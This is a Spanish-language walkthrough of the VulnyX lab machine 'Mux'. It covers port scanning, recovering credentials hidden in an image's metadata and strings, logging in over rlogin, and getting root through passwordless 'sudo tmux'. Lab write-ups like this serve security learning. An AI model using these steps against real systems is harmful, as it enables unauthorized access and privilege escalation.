cd ~/blog

~/writeups/vulnyx/14-mux.md

14 - Mux

low Linux vulnyx 18-08-2024
Credentials hidden in image (stego)rlogin/rsh weak authenticationsudo tmux Privesc
vulnyx.com

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.146
 nmap -sCV -p 80,512,513,514 -oN 02-targeted.txt 192.168.1.146
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 00:01 -04
Nmap scan report for 192.168.1.146
Host is up (0.00031s latency).

PORT    STATE SERVICE    VERSION
80/tcp  open  http       Apache httpd 2.4.56 ((Debian))
|_http-title: Monna Lisa
|_http-server-header: Apache/2.4.56 (Debian)
512/tcp open  exec       netkit-rsh rexecd
513/tcp open  login      OpenBSD or Solaris rlogind
514/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.60 seconds

Los servicios r-* (rexec, rlogin, rsh) son protocolos legacy de acceso remoto. En el sitio web encontramos una imagen de la Mona Lisa que descargamos y analizamos en busca de datos ocultos (esteganografía). Tanto los metadatos como las cadenas del archivo filtran credenciales:

 exiftool image.jpg
...
Comment: lisa:My_$3cUr3_RSH_p@zz
...

 strings image.jpg -n 9
...
lisa:Gi0c0nd@
...

Al usar Kali Linux, el cliente rlogin no viene instalado, así que descargamos e instalamos manualmente el paquete rsh-client:

 wget http://http.us.debian.org/debian/pool/main/n/netkit-rsh/rsh-client_0.17-24_amd64.deb
 sudo dpkg -i rsh-client_0.17-24_amd64.deb

Nos conectamos con rlogin usando la contraseña Gi0c0nd@ y obtenemos la primera flag:

 rlogin lisa@192.168.1.146
Password: Gi0c0nd@
Last login: Sun Aug 18 06:20:05 CEST 2024 from 192.168.1.5 on pts/0
lisa@mux:~$

Para escalar privilegios, revisamos los permisos sudo:

lisa@mux:~$ sudo -l
Matching Defaults entries for lisa on mux:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User lisa may run the following commands on mux:
    (root) NOPASSWD: /usr/bin/tmux

Podemos ejecutar tmux como root sin contraseña. Como tmux lanza una shell interactiva dentro de su sesión, basta con invocarlo para obtener un intérprete con privilegios de root:

lisa@mux:~$ sudo tmux
root@mux:/home/lisa#

Obtenemos la flag y fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados